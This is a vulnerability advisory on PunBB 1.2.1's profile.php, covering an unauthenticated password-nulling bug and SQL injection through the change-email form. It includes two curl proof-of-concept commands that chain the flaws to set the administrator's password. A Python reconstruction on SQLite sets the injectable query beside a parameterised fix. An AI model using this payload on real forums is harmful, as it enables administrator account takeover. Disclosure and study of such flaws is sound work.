=======================================================
Multiple vulnerabilities in punbb-1.2.1 profile.php
=======================================================

Description
-----------

A remote attacker without an account can set the password of any user on the system to NULL, effectively shutting them out of the system.

A user on the system can also inject an arbitrary SQL statement using the change email feature. This is caused by a fault in the is_valid_email function, which returns true for strings that are not even close to being a valid email address, so the unvalidated value reaches the query. Systems with the magic_quotes_gpc option enabled in php.ini are affected as well.

By combining these two, an attacker with an account on the forum can change the password of any user to anything they want, gaining full access to the administrator account.

Proof of concept
----------------

Examples of the damage the DoS attack and the arbitrary SQL statement attack can do on their own have been omitted. This is a demonstration of their power when combined.

Assumptions for this particular example:

- There is a user on the system with id 3 whose username/password are 'sha'/'passwd'.
- The cookie is a valid login cookie for 'sha' on the system.
- The system supports sha1.
- The new password for the id 2 account is supposed to be 'newpass' (id 2 is the first administrator account in a default PunBB install).

    curl --cookie punbb_cookie= --form form_sent=1 --form req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- sha@punbb.com" http://target/profile.php?action=change_email\&id=3

This pushes the sha1 hash of the password 'newpass' into the activate_string field of every user: the single quote closes the string literal and the '--' comments out the remainder of the UPDATE statement, including its WHERE clause. All that remains is to copy this field into the password field of any user we want, using the other bug:

    curl http://target/profile.php?action=change_pass\&id=2\&key=

Now the account with user id 2 has the password 'newpass' set.
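The following is an added example, not code from the advisory or from PunBB, that reconstructs the first step against an in-memory SQLite table. It assumes (the advisory does not show the query) that change_email runs a statement of the shape UPDATE users SET activate_string='<new_email>' WHERE id=<id> with the email interpolated as a string, and it places the same interpolated query beside a parameterised one. The users table, the usernames and the SQLite backend are constructed stand-ins; the change_pass step is not modelled because the advisory does not state why the empty key is accepted.

```python
"""Reconstruction of the punbb-1.2.1 change_email injection (added example).

Assumptions, not taken from the advisory: the affected query has the shape
    UPDATE users SET activate_string='<new_email>' WHERE id=<id>
and the new email is interpolated as a string after the permissive
is_valid_email() check. The table layout is a constructed stand-in for the
PunBB users table and SQLite is used in place of MySQL.
"""
import hashlib
import sqlite3

TARGET_ID = 2    # first administrator account in a default PunBB install
ATTACKER_ID = 3  # the attacker's own account ('sha' in the advisory)


def fresh_db():
    """Constructed users table: guest, an admin and the attacker's account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
               "password TEXT, activate_string TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "Guest", None, None),
        (2, "admin", hashlib.sha1(b"secret").hexdigest(), None),
        (3, "sha", hashlib.sha1(b"passwd").hexdigest(), None),
    ])
    return db


def injection_payload(new_password):
    """The req_new_email value from the advisory: the sha1 hash of the desired
    password, a quote to close the string literal, and '-- ' to comment out
    the rest of the statement (the WHERE clause included)."""
    return hashlib.sha1(new_password.encode()).hexdigest() + "' -- sha@punbb.com"


def change_email_vulnerable(db, user_id, new_email):
    """String interpolation, as assumed for 1.2.1: the attacker controls the
    tail of the statement, so every row is updated, not just user_id's."""
    db.execute("UPDATE users SET activate_string='%s' WHERE id=%d"
               % (new_email, user_id))
    db.commit()


def change_email_fixed(db, user_id, new_email):
    """Parameterised statement: the payload is stored as plain data and only
    the requesting user's own row changes."""
    db.execute("UPDATE users SET activate_string=? WHERE id=?",
               (new_email, user_id))
    db.commit()


def activate_strings(db):
    """Map of user id -> activate_string for every row."""
    return {row[0]: row[1] for row in
            db.execute("SELECT id, activate_string FROM users ORDER BY id")}


def run(change_email):
    """Submit the payload as the attacker (id 3) through the given
    change_email implementation and return every user's activate_string."""
    db = fresh_db()
    change_email(db, ATTACKER_ID, injection_payload("newpass"))
    return activate_strings(db)


if __name__ == "__main__":
    print("vulnerable:", run(change_email_vulnerable))  # hash in every row
    print("fixed:     ", run(change_email_fixed))       # payload only in row 3
```

With the interpolated query the attacker's hash lands in every user's activate_string, which is exactly what the second curl request relies on; with the parameterised query the same input is stored verbatim in the attacker's own row and the administrator's row is untouched.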